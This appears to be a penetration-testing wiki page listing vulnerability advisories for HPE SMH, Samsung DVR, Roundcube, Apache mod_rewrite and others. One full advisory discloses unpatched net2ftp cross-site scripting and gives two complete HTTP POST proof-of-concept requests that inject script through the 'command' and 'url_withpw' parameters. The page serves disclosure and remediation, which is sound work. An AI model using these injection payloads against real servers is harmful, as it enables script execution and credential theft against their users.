Category: advisory

Penetration Testing Wiki

HPE SMH XSS DOM-Based Advisory

Product: HPE System Management HomepageVersions: ALL versions and platforms affected (Tested on v7.6.0.11 for MS Windows)Vulnerability: JavaScript Injection in file gsearch.php, parameter prodOWASP TOP 10: A1 InjectionType: Javascript InjectionImpact: Allows an attacker to perform an XSS (Cross-Site Scripting) DOM-based attack, execute arbitrary JavaScript client-side, steal admin credentials, etcAccess Vector: Adjacent NetworksAccess Complexity: LowAuthentication: NoneCVE: CVE-2017-12544…
Read more

CVE-2017-12544 Hewlett Packard Enterprise, HP System Management Homepage Software prior to 7.6.1 Cross-site Scripting (XSS)

The HP System Management Homepage (SMH) is a web-based interface that consolidates and simplifies the management of ProLiant and Integrity servers running Microsoft Windows or Linux, or HP 9000 and HP Integrity servers running HP-UX 11i. https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us Original Advisory: https://www.securityfocus.com/archive/1/541823/30/0/threaded

Google dork for iDC File Manager

iDC File Manager is a secure multi user web based File Management System, that allows you to store, manage and share every format of digital media, including, documents, images, audio, video, publishing layouts, presentations and PDF files Between you and your end users. If your Company has a requirement to distribute or share files with…
Read more

CVE-2016-10113 I got my first CVE!

Samsung DVR Web Viewer weak credentials MITRE assigned me on January 4th 2017, CVE-2016-10113 for reporting this vulnerability. Samsung DVR Web Viewer is by default using HTTP (port 80) and transmits the credentials encoded in the Cookie header using very bad security practice, just encoding the login and password in BASE64 codification. It is trivial…
Read more

[0day] net2ftp multiple XSS on unauthenticated users

Summary Subject: net2ftp XSS in “command” and “url_withpw” parametersVersions vulnerable: ALL (Tested on latest, version 1.0)Category: 0-dayImpact: Medium Description of the product net2ftp is a web based FTP client (http://www.net2ftp.com/index.php).It can be used as a standalone version and also integrated in some web platforms as ISP providers, e-commerce sites and other websites. Description of the vulnerabilities Doing a vulnerability research on net2ftp, latest version 1.0. Jacobo Avariento had found several cross-site scripting (XSS) found in skins/shinra/bookmark1.template.php (line 18) “url_withpw” parameter, and in skins/shinra/raw1.template.php (line 5) with “command” parameter. The first, parameter “url_withpw” is triggered when the user is placing a bookmark on that FTP connection. The second, parameter “command”, is triggered when the user access the FTP interactive mode for sending FTP arbitrary commands to the server. Proof of concept XSS in parameter “command” POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.phpCookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmfConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 391 ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=raw&state2=main&directory=%2F&screen=&command=CWD+%0D%0APWD%0D%0A%3C%2Ftextarea%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&text=501+Invalid+number+of+arguments%0D%0A257+%22%2F%22+is+the+current+directory%0D%0A XSS in parameter “url_withpw” POST /net2ftp_v1.0/files_to_upload/index.php HTTP/1.1Host: 192.168.1.103User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateReferer: http://192.168.1.103/net2ftp_v1.0/files_to_upload/index.phpCookie: net2ftpcookie_ftpserver=192.168.1.103; net2ftpcookie_ftpserverport=21; net2ftpcookie_username=anonymous; net2ftpcookie_language=en; net2ftpcookie_skin=shinra; net2ftpcookie_ftpmode=automatic; net2ftpcookie_passivemode=no; net2ftpcookie_protocol=FTP; net2ftpcookie_viewmode=list; net2ftpcookie_directory=%2F; PHPSESSID=HNM7kDAFz3Gpi%2CCUYHlUEt5nlmfConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 1141 ftpserver=192.168.1.103&ftpserverport=21&username=anonymous&language=en&skin=shinra&ftpmode=automatic&passivemode=no&protocol=FTP&viewmode=list&sort=&sortorder=&state=bookmark&state2=main&directory=%2F&url_withpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Bpassword_encrypted%3D%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Draw%26amp%3Bstate2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D%22%3C%2Fa%3E%3Cscript%3Ealert%28%22Sofistic%22%29%3B%3C%2Fscript%3E&url_withoutpw=%2Fnet2ftp_v1.0%2Ffiles_to_upload%2Findex.php%3Fftpserver%3D192.168.1.103%26amp%3Bftpserverport%3D21%26amp%3Busername%3Danonymous%26amp%3Blanguage%3Den%26amp%3Bskin%3Dshinra%26amp%3Bftpmode%3Dautomatic%26amp%3Bpassivemode%3Dno%26amp%3Bprotocol%3DFTP%26amp%3Bviewmode%3Dlist%26amp%3Bsort%3D%26amp%3Bsortorder%3D%26amp%3Bstate%3Dlogin_small%26amp%3Bstate2%3Dbookmark%26amp%3Bgo_to_state%3Draw%26amp%3Bgo_to_state2%3Dmain%26amp%3Bdirectory%3D%252F%26amp%3Bentry%3D&text=net2ftp+192.168.1.103 Impact Due to a possible lack of validation of cookie and session parameters it is possible to trigger the attacks directly, without need to log in in the server or the website. Because of this circumstances, the risk of the vulnerability is tagged as “medium” as there is no authentication and can be triggered in any net2ftp software online. It has been proved that several ISP providers use this software for their clients, among other customers. Timeline Jul 24/2016: The vendor has been already contacted, no reply until date of public diclosure. Further Actions We recommend all sysadmins and web developers who are using net2ftp software to review the files skins/shinra/bookmark1.template.php and skins/shinra/raw1.template.php manually, and patch the XSS because no official patches are released or planned yet.

Vpopmail/QmailAdmin Multiple Integer Overflows

Author: Jacobo Avariento GimenoRelease Date: May 8, 2009CVE/bugtraq id: Not assigned yetSeverity: Low/Medium Vendor’s Description of Software:“Vpopmail is a free GPL package developed by Inter7 to provide an easy way to manage virtual email domains and non /etc/passwd email accounts for qmail or postfix mail servers.” [1] “qmailAdmin is a free software package that provides…
Read more

CVE-2008-5619 Roundcube Webmail 0.2 Remote Code Execution

Public Release Date of POC: 2008-12-22Author: Jacobo AvarientoCVE id: CVE-2008-5619Bugtraq id: 32799Severity: CriticalVulnerability reported by: RealMurphy Intro Roundcube Webmail is a browser-based IMAP client that uses “chuggnutt.com HTML to Plain Text Conversion” library to convert HTML text to plain text, this library uses the preg_replace PHP function in an insecure manner. Vulnerable versions RoundCube Webmail…
Read more

Exploit & info about off-by-one overflow in mod_rewrite module of Apache HTTP server

CVE-2006-3747 POC & exploit for Apache 1.3/2.0/2.2 mod_rewrite off-by-one, SecurityFocus https://www.securityfocus.com/archive/1/443870 Vulnerable Apache Versions 1.3 branch: >1.3.28 and <1.3.37 2.0 branch: >2.0.46 and <2.0.59 2.2 branch: >2.2.0 and <2.2.3 However, due to the nature of the off-by-one sensitive exploitation not all the vulnerables versions are exploitables ones. I did a successful attack on Apache 1.3.34…
Read more